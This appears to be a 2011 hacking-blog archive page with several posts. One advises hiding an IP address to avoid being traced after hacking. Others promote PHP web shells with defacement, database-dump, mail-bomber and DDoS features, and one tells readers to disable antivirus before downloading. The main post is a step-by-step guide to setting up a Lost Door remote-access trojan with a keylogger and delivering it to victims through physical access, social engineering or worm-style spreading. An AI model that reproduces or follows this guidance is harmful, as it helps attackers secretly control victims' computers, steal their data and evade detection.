Showing posts with label captcha. Show all posts
Showing posts with label captcha. Show all posts
Protect your online identity !
Wednesday, August 24, 2011 // by Hacking Beast Editor //
Labels:
captcha,
Cyber News,
Cyber Security,
exploit,
ftp,
hackers news,
hacking,
keylogger,
knodledge,
New Releases,
tech news,
technology,
tips and tricks,
vulnerability
//
0
comments

If you hack websites or hack into computers or any other thing online , then you need to protect your online identity . you all are familiar with IP address . It is a Internet Protocal address it is like your online address like your home address . If u have hacked any email,website,pc and if u have not protected your ip or if u don't have hide your ip then you can be easily traced . Don't worry you can be anonymous online just by using a simple website ..
You can be safe online by using Hide My Ass

First your IP was like this by using www.whatismyip.com

But after using Hide My Ass server our IP is

This method 100% works you can also buy superb! VPN from the website and can also creat anonymous emails.


Mini PHP Shell 27.9 V2 Released
Thursday, August 4, 2011 // by Hacking Beast Editor //
Labels:
captcha,
Cyber News,
Cyber Security,
database,
ddos,
defacements,
desktoppishing,
exploit,
ftp,
hackers news,
hacking,
knodledge,
New Releases,
sql,
tech news
//
0
comments
According to Developer jos_ali_joe and [Devilzc0de] "This is a continuation of PHP Shell Mini 27.9 V1 , Editing Shell c99 and new tools ".
Features : Encoder , Processes , FTP-Brute-Forcer , Server-Information , SQL-Manager and etc.
Download : http://www.megaupload.com/?d=DRHS3AV9
This tool may have backdoor so download it carefully and turn your antivirus off


Devil Shell V 2.0 Releasing
Saturday, July 9, 2011 // by Hacking Beast Editor //
Labels:
captcha,
Cyber News,
Cyber Security,
database,
defacements,
exploit,
hackers news,
hacking,
knodledge,
New Releases,
softwares,
tech news,
technology,
tools,
website hacking
//
1 comments
Hello Dear Readers, I am very glad to tell you all that the new version of India's First Shell going to release on 10 July 2011 .. This shell is coded by Underground Devil. Admin at Team Nuts .. So stay tuned with us to get the latest updates from Devil Shell here are its functions and some official screenshots from UgDevil
FUNCTIONS ARE :-
feature are
# Undetectable by Google Dork
# Back-Connect [Available in Paid Version]
# Database Dump [Automatic Dump available in Paid Version][NEW]
# SQL and Linux Command Run[NEW]
# Front/Deface Page Creator[NEW]
# Mail Bomber Testing
# DDoS attacker Testing
# Self kill
# Indiviusal Login's
# and many more
FUNCTIONS ARE :-
feature are
# Undetectable by Google Dork
# Back-Connect [Available in Paid Version]
# Database Dump [Automatic Dump available in Paid Version][NEW]
# SQL and Linux Command Run[NEW]
# Front/Deface Page Creator[NEW]
# Mail Bomber Testing
# DDoS attacker Testing
# Self kill
# Indiviusal Login's
# and many more
How to Control a Remote Computer using Lost Door
Saturday, June 25, 2011 // by Hacking Beast Editor //
Labels:
captcha,
desktoppishing,
exploit,
ftp,
keylogger,
knodledge,
New Releases,
servers,
wify
//
0
comments

Throughout this article I will teach you how to use Lost Door, a Windows RAT, to control and monitor a victim’s computer remotely.
Disclaimer: Coder and related sites are not responsible for any abuse done using this software.
Follow the steps below to setup a server for Lost Door.
- Download Lost Door from here . (Update: In case the given download link doesn’t work, use this secondary download link. The password to unzip this file is “ehacking.nethungry-hacker.com” without double quotes.)
- On executing the download file, you will see the following screen. Accept it
- After it is open, right click on the window and click on create server
- Now enter your IP address and DNS here. Leave the rest of the field as it is.
- Now click on the ‘Options’ tab and choose the options as you want. To activate an offline keylogger is a good practice.
- Now go to ‘Advanced’ Tab. There will options related to spreading. This will be used in case you have more than 1 victim.
- Now just go to the ‘Create’ tab and click on create server. Your server is ready for use now and now send it to the victim.
Sending the server file to your victim
This is the most important thing after you have created your server file. If you want to take control on a single computer than you have to send this server file to the desired victim but if you want to affect more and more people than you have to use some spreading techniques.
- If you have physical access to the victim’s computer then take the server file in a pen drive and just double click on your server file once you have injected the pen drive into that computer.
- For those who don’t have physical access can use social engineering in order to get the victim execute that file on his computer.
Using Spreading to affect multiple victims
If you have more than one victim, then you have an option of using spreading technique. You might think that by creating multiple server files you can control multiple users. But here is a secret about spreading. When you select the spreading option, the server file will act as a worm which will spread itself across different computers via Email or any other channel. So your burden will be only to get one victim to execute that file on his computer, the remaining job of getting other victims will be done on its own.
What is CAPTCHA?
Monday, June 20, 2011 // by Hacking Beast Editor //
Labels:
captcha,
knodledge,
website hacking
//
0
comments
|